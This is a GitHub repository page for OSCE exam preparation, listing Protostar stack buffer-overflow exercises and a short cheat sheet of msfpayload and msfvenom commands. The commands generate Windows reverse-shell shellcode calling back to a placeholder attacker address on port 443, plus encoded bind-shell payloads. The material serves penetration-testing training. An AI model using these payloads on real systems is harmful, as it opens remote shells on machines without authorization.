Skip to content
/ OSCE Public
forked from bigb0sss/OSCE

Public Exploits + Extra-curriculum for OSCE Exam Preparation

Notifications You must be signed in to change notification settings

pei-han/OSCE

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Exploit Writeups

Exploit Exercise (Protostar)

Module Link Note
Stack0 Stack BOF Intro
Stack1 Stack BOF Basic1
Stack2 Stack BOF Basic2
Stack3 Stack BOF Basic3
Stack4 Stack BOF Basic4
Stack5 Stack BOF Shellcode
Stack6 Stack BOF ret2libc ROP is no need for OSCE
Stack7 Stack BOF ret2.text ROP is no need for OSCE. But learn POP; POP; RET concept with this

Links

Reviews

Github

Resources


Reverse Shell

Windows XP/Vista Ultimate

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

Later Windows

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C 

msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

Bind Shell

Windows XP/Vista Ultimate

msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

Later Windows

msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl

About

Public Exploits + Extra-curriculum for OSCE Exam Preparation

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 88.9%
  • Perl 11.1%